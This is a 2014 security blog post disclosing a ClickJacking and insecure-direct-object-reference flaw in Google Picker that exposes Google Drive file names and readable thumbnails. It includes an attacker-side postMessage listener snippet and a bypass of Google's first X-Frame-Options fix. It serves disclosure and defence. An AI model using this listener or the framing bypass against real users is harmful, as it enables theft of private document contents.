ClickJacking vulnerability leads to information leakage in Google Drive

This blog post reports on a ClickJacking vulnerability in Google Drive that has remained unfixed for more than five months. I will discuss how I discovered this vulnerability in a semi-automated fashion, what caused it, and how Google could (and should) have fixed it.

In an attempt to live up to Mr. Curtis “50 Cent” Jackson’s life guidance (Get Rich Or Die Tryin’), I wanted to automate many of the checks I perform when hunting bugs manually. One of these checks verifies whether web pages send the correct security headers. A header that should be present on every web page containing a form that initiates a state change is X-Frame-Options. By sending this header, a website operator can protect its users against ClickJacking attacks.

NOTE: X-Frame-Options is not the only mechanism to protect against ClickJacking, the frame-ancestors directive of CSP does this as well.

Hustler’s Ambition

As the amount of time I had for creating this was rather limited, I decided to implement the mechanism as a browser plugin that logs all pages that contain a form but do not send the X-Frame-Options header. Since I regularly use the websites subject to my analysis, all I had to do was wait and keep going ’til I hit the spot.
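The core check the plugin performs can be sketched as a small predicate. This is my own illustration, not the plugin’s actual source; apart from the header names, every identifier here is made up:

```javascript
// Sketch: decide whether a page is a ClickJacking candidate, given its
// response headers and whether it contains a form. A page is flagged when
// it has a form but neither X-Frame-Options nor a CSP frame-ancestors
// directive protects it against framing.
function isClickjackingCandidate(headers, hasForm) {
  const names = Object.keys(headers).map(function (h) { return h.toLowerCase(); });
  const hasXfo = names.indexOf('x-frame-options') !== -1;
  // CSP's frame-ancestors directive also blocks framing, as noted earlier
  const csp = headers['Content-Security-Policy'] ||
              headers['content-security-policy'] || '';
  const hasFrameAncestors = /frame-ancestors/i.test(csp);
  return hasForm && !hasXfo && !hasFrameAncestors;
}
```

In a real extension, the headers would come from an API such as Chrome’s chrome.webRequest.onHeadersReceived, and flagged pages would be appended to a log for later review.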

NOTE: I assumed that only pages with forms would be vulnerable to ClickJacking attacks, but this might not always be the case.

A few weeks later, I started analysing the log files to check if I had hit something. After going through some false positives (Google Maps, Google Sites, forms on Google Docs, …), I found something interesting: Google Picker.

Google Picker is a “File Open” dialog for the information stored in Google servers.

With Google Picker, your users can select photos, videos, maps, and documents stored in Google servers. The selection is passed back to your web page or web application for further use.

Use Google Picker to let users:

  • Access their files stored across Google services.

  • Upload new files to Google, which they can use in your application.

  • Select any image or video from the Internet, which they can use in your application.

So, you select your files from Google, and send information about them to a third party. I would assume that as a user, I would have to give some permission for a third party to get information on my private files, or that I at least would clearly see what I was doing, right? Right?!

Window Shopper

So here’s what we know: the Google Picker page can be framed, and some information about selected files is sent to the parent window. By analysing the Google Picker tool, I quickly found that the information is sent cross-origin using the postMessage mechanism. You can read all about this mechanism on MDN, but in short: when there are two windows, one can call otherWindow.postMessage(message, targetOrigin, [transfer]) to send a message. If otherWindow is listening (via window.addEventListener("message", ...)), it will receive the message.
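As a minimal sketch of that pattern (the origins are made up for illustration): the embedding page calls frame.contentWindow.postMessage(payload, 'https://receiver.example'), and the receiving window registers a listener. A careful receiver checks event.origin before trusting anything:

```javascript
// Sketch of a receiving window's message handler. Only messages coming
// from the expected origin are parsed; everything else is ignored.
function handleMessage(event, trustedOrigin) {
  if (event.origin !== trustedOrigin) {
    return null; // drop messages from untrusted senders
  }
  return JSON.parse(event.data);
}

// In a browser this would be wired up as:
// window.addEventListener('message', function (e) {
//   var data = handleMessage(e, 'https://sender.example');
//   if (data) { /* use data */ }
// });
```

Note that this origin check only protects the receiver; nothing forces the sender to pick a trustworthy targetOrigin, which is exactly what is exploited here.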

Google Picker determines the target origin and window based on a parameter in the URL. Setting this parameter to the desired attack domain will take you to the candy shop. By playing a bit with the parameters, I managed to show only PDF files, as these are the most likely to be sensitive. This is the page that will be framed: [Redacted]

Now let’s see what data is sent to the attacker through postMessage:

    {
        "s": "picker",
        "f": "",
        "c": 0,
        "a": [{
            "action": "picked",
            "viewToken": ["pdfs", null, {
                "mode": "list"
            }],
            "docs": [{
                "id": "0B2QAJJg95dkIRGxsSHd3YzRtbWc",
                "serviceId": "DoclistBlob",
                "mimeType": "application/pdf",
                "name": "S3CR3T.pdf",
                "type": "document",
                "lastEditedUtc": 1379511652399,
                "iconUrl": "",
                "description": "",
                "url": "",
                "embedUrl": "",
                "thumbnails": [{
                    "url": "",
                    "width": 32,
                    "height": 32
                }, {
                    "url": "",
                    "width": 64,
                    "height": 64
                }, {
                    "url": "",
                    "width": 72,
                    "height": 72
                }, {
                    "url": ""
                }],
                "sizeOnDisk": 0
            }],
            "view": "pdfs"
        }],
        "l": false,
        "g": true,
        "r": ""
    }

There are two interesting pieces of data here: the name of a file and its thumbnails. One could argue that a file name is not that sensitive, but I’d rather not have a stranger going through the names of the files I store on Google Drive. And what about the thumbnails? An attacker can’t do anything with those, since Google would only allow the owner (and the people the file is shared with) to view a thumbnail, right? Right?!
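On the attacker’s page, harvesting this data is trivial. Here is a sketch of such a listener (all identifiers are mine; the message format is the one shown above):

```javascript
// Sketch: extract file names and thumbnail URLs from a Google Picker
// postMessage payload of the shape shown above.
function extractPickedDocs(messageData) {
  const parsed = typeof messageData === 'string' ? JSON.parse(messageData) : messageData;
  const actions = parsed.a || [];
  const picked = actions.filter(function (a) { return a.action === 'picked'; })[0];
  if (!picked) return [];
  return picked.docs.map(function (doc) {
    return {
      name: doc.name,
      thumbnails: (doc.thumbnails || []).map(function (t) { return t.url; })
    };
  });
}

// In the attacker's page this would hang off the message event:
// window.addEventListener('message', function (e) {
//   console.log(extractPickedDocs(e.data));
// });
```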

Outta Control

As you might have guessed, Google fails to verify whether a user is authorized to view the (sensitive) thumbnail. Hell, they even allow unauthenticated access to it! At the time of writing, this is still not fixed. The thumbnail (actually a clear snapshot of the first page of the document; see the example) for the selected PDF file is publicly available for one to two hours, leaving the attacker more than enough time to download it.

OWASP names this type of vulnerability Insecure Direct Object References, and it comes as no surprise that it is listed at number 4 of the OWASP Top Ten for 2013, just after XSS.

Interestingly, Google has been aware for quite some time that these thumbnails may be sensitive. On the Google Picker API forums, Jon Emerson (Engineering Manager at Google) says:


I dug into this for you, and here’s what I found: The expiration & cookie enforcement is a deliberate choice by the Google Docs folks:

The thumbnails are technically resizable so you can get a 2048x2048 version of the document. At that resolution, you can read the document, which would be really bad if it’s a private document you didn’t intend to share with people. To protect user’s security, we therefore restrict who can view thumbnails, and we also expire them in case cookies leak.


He was only partially correct. Google does restrict who can view thumbnails, but only for documents created by Google Drive (Document, Presentation, Spreadsheet, …). Apparently, the earlier comment in the thread, where a user reports that the thumbnail returns a 403 response for only half of the files, did not ring any alarm bells.

Also, according to Kuntal Loya, Software Engineer at Google, thumbnails for Google Drive items would no longer be returned as of February 7, 2013. That is more than a year ago.

To make matters worse, when I first reported this vulnerability on September 18th, 2013, I quickly got a reply that the issue was a duplicate, meaning I was not the first to report it. And since I found this vulnerability in a semi-automated way, I’m quite confident that finding it is child’s play for an attacker. This is the main reason I’m publicly disclosing this vulnerability, in addition to Google’s stance on responsible disclosure, which clearly states the following:

Whilst every bug is unique, we would suggest that 60 days is a reasonable upper bound for a genuinely critical issue in widely deployed software. This time scale is only meant to apply to critical issues.

While this vulnerability may not qualify as “critical”, it is still quite serious in my opinion, given how easy it is for attackers to steal the contents of your private files. Even if Google didn’t manage to completely mitigate the attack in four months, they could at least have applied the correct authorization checks for thumbnails, or left out thumbnails completely, as they said they would.

What Up Gangsta

Above, I mentioned that it is easy for an attacker to steal the sensitive data. You don’t have to take my word for it; just see for yourself in this YouTube video I made when I initially reported the vulnerability to Google. To avoid handing script kiddies all the information required to set up their own ClickJacking page, I will not disclose the source code of the PoC until Google fixes this vulnerability.

The Google Picker API actually allows you to do a bunch of things, so I created another PoC that is more appealing to the creeps who are reading this. If a user previously allowed access to their webcam, they can now be targeted in a ClickJacking attack that activates the camera, records a movie, stores it to Google Drive, and sends a “thumbnail” to the attacker (again, this thumbnail is publicly available). You can view the PoC on YouTube.

Places To Go

I’ve shown you in detail the cause and consequences of this vulnerability; now I’ll discuss how it can be mitigated. Google has taken some “steps” already: the Google Picker page now sends the X-Frame-Options header with the value DENY. A workaround is quite easy: adding &origin= to the URL. When this parameter is set, the Google Picker page sends out X-Frame-Options: ALLOW-FROM with the given origin. My assumption is that Google did this to keep track of hosts that (ab)use the Google Picker API. However, as some popular browsers (Chrome, Safari, Opera) don’t recognize the ALLOW-FROM directive, the value of the origin parameter can be random if the attacker doesn’t care about Firefox users.

There’s still a lot needed to reach a secure solution. The shift to require OAuth for authentication is a first step in the right direction, but as long as it is not enforced, it solves nothing. On the Google Picker API forums, Kuntal Loya posted that by January 15th, 2014, Google Picker would stop working without an OAuth token. In the meantime, this has been postponed to April 15th, 2014. My assumption is that some part of the Google Picker API is not yet fully compatible with OAuth, and that Google favors availability over security. Given that millions of people have (sensitive) data hosted on Google Drive, while only tens or hundreds of developers (based on the activity in the Google Picker API forums) rely on the availability of the tool, I do not agree with this choice. Of course, I’m not a Google employee, so I’m unaware of any additional issues this shift might bring along.

Despite the difficulties of the shift towards OAuth, Google should at least have enforced authorization for thumbnails (or left them out altogether) by now. They already do it for Google Drive documents; doing it for the rest of the files as well would certainly stop most hustlers!
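For comparison, the missing server-side check is conceptually simple. A hypothetical sketch follows; Google’s real access-control model is obviously far more involved, and every name here is my own:

```javascript
// Sketch: the authorization rule Google already applies to Google Drive
// documents, which should apply to the thumbnails of every file type.
function canViewThumbnail(requester, file) {
  if (!requester) {
    return false; // no unauthenticated access to thumbnails
  }
  if (requester.id === file.ownerId) {
    return true; // the owner may always view the thumbnail
  }
  // otherwise, only users the file was explicitly shared with
  return file.sharedWith.indexOf(requester.id) !== -1;
}
```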

Funny How Time Flies

  • September 18, 2013: Initial report sent to Google
  • September 19, 2013: Response from Google notifying me that the reported issue is a duplicate, and that they “expect a fix to be forthcoming”
  • October 1, 2013: Initial “fix”, requiring the origin parameter
  • December 9, 2013: Date to require OAuth set to January 15, 2014
  • February 3, 2014: Wrote this blog post, and notified Google
  • February 3, 2014: Date to require OAuth delayed to April 15, 2014
  • February 18, 2014: Publicly disclosed vulnerability

Previously, the public disclosure of a vulnerability I found in Google Scholar resulted in a fix within one day. Although fixing the current issue seems more complex, I do hope that publicly disclosing this information will considerably speed up the process. Given that the issue can be found in a semi-automated fashion, that no steps were taken to prevent unauthorized access to “thumbnails”, that this vulnerability has existed for at least five months, and that an actual fix has been postponed for four months, this Sword of Damocles needs to come down sooner rather than later. For the time being, you may want to make sure that no sensitive information can leak through the “thumbnails” of your files hosted by Google.

If you have remarks, or additional questions, feel free to contact me on Twitter!

UPDATE (February 20, 2014): Google has added a temporary mitigation by requiring OAuth for most origins. Although there are still a few exceptions, such as certain domains, this fix definitely makes the vulnerability harder to exploit.